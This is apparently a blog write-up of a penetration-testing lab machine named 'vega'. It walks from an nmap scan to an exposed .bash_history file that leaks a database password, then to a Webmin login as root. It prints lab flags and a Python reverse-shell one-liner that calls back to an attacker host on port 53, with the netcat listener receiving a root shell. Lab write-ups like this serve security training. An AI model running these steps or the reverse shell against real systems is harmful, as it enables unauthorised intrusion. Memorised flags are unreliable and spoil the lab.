ptd-vega

As always we start with a nmap scan

E:\PENTEST\NMAP>nmap -A 10.150.150.222
Starting Nmap 7.70 ( https://nmap.org ) at 2021-02-08 08:56 W. Europe Standard Time
Nmap scan report for vega (10.150.150.222)
Host is up (0.031s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 af:56:59:c5:9a:de:f4:a9:b7:8f:34:4b:a2:21:24:71 (RSA)
| 256 1b:e8:16:d4:dc:a6:7a:3e:5d:6f:f2:95:5a:59:08:9a (ECDSA)
|_ 256 9c:35:dd:da:ee:a9:b4:0b:55:68:45:fd:8f:85:35:30 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Did not follow redirect to http://10.150.150.222/?SID=u4lc77vbafcrv7vrskh0c4ciqa
8089/tcp open ssl/http Splunkd httpd
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2019-10-25T09:19:54
|_Not valid after: 2022-10-24T09:19:54
10000/tcp open http MiniServ 1.941 (Webmin httpd)
|_http-server-header: MiniServ/1.941
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4.26
OS details: Linux 2.4.26 (Slackware 10.0.0)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 5900/tcp)
HOP RTT ADDRESS
1 ...
2 31.00 ms vega (10.150.150.222)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 89.51 seconds

E:\PENTEST\NMAP>

.

C:\Users\puckiestyle>curl http://10.150.150.222/.bash_history
history
sudo apt-get update && apt-get upgrade -y
sudo apt install apache2
sudo systemctl enable apache2
sudo apt install mariadb-server
sudo a2enmod rewrite
sudo nano /etc/apache2/sites-available/magento2.example.com.conf
sudo a2dissite 000-default.conf
flag40=3e11129fe2d30563999cd1d5602a1f7eb90e2176
sudo systemctl reload apache2
sudo a2ensite magento2.example.com.conf
sudo systemctl reload apache2
cd /tmp/
cd logstalgia-1.0.3/
./configure
sudo passwd root
apt-get install libsdl1.2-dev libsdl-image1.2-dev libpcre3-dev libftgl-dev libpng12-dev libjpeg62-dev make gcc
./configure
make
apt-get install libsdl1.2-dev libsdl-image1.2-dev libpcre3-dev libftgl-dev libpng12-dev libjpeg62-dev make gcc++
apt-get install libsdl1.2-dev libsdl-image1.2-dev libpcre3-dev libftgl-dev libpng12-dev libjpeg62-dev make gcc
apt-get install make
mysql -u root -p
apt-get install grsync
apt-get install unison
unisonsudo systemctl restart apache2
ping 1.1.1.1
ping 8.8.8.8
sudo apt install software-properties-common
sudo apt-key adv --recv-keys --keyserver hkp://keyserver.ubuntu.com:80 0xF1656F24C74CD1D8
sudo add-apt-repository 'deb http://mirrors.coreix.net/mariadb/repo/10.2/ubuntu xenial main'
sudo apt update
echo FLAG40=3e11129fe2d30563999cd1d5602a1f7eb90e2176
sudo apt install mariadb-server -y
netstat -np | grep 22
mysql -u root -p
mysql -u magento -p
sudo apt install php7.0 php7.0-curl php7.0-mysql libapache2-mod-php7.0
sudo nano /etc/php/7.2/cli/php.ini
ipconfig
ifconfig
sudo nano /etc/php/7.2/apache2/php.ini
sudo nano /etc/apache2/sites-available/magento2.example.com.conf
sudo crontab -u vega -e
sudo systemctl restart apache2
sudo cat /var/log/apache2/error.log
sudo chown -R www-data:www-data .
sudo nano /etc/apache2/sites-available/magento2.example.com.conf
sudo /etc/init.d/apache2 restart
sudo nano /etc/apt/sources.list
cd /tmp/
wget http://www.webmin.com/jcameron-key.asc
sudo systemctl reload apache2
cd /tmp/
cd logstalgia-1.0.3/
./configure
cd /home/vega
ls -lah
ifconfig
sudo passwd rootsudo apt-key add jcameron-key.asc
sudo apt update
sudo apt install webmin
cd ..
history
mysqldump -u vega --password=puplfiction1994 magento2 > dumpmagento.sql
cd /home/vega
ls -lah
ll
sudo su
cd /root/
nano CAM.shortcut

C:\Users\puckiestyle>

We can use vega / pulpfiction1994 to logon to https://vega:10000

.

.



.

.

> ls
CAM.shortcut
FLAG42.txt
> cat FLAG42.txt
95beef4e71ae3a503282ac54acb6d9cdc547f8c8
> whoami
root
> hostname
vega
> cat CAM.shortcut
URL: http://10.150.150.250

Notes: Do not forget the cam is only reachable from this jumpstation and another one. [ stuntman mike ]

to get a reverse shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.66.66.42",53));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

.

E:\PENTEST>nc -nlvp 53
listening on [any] 53 ...
connect to [10.66.66.42] from (UNKNOWN) [10.150.150.222] 46718
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# hostname
vega
#

Author : Puckiestyle

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *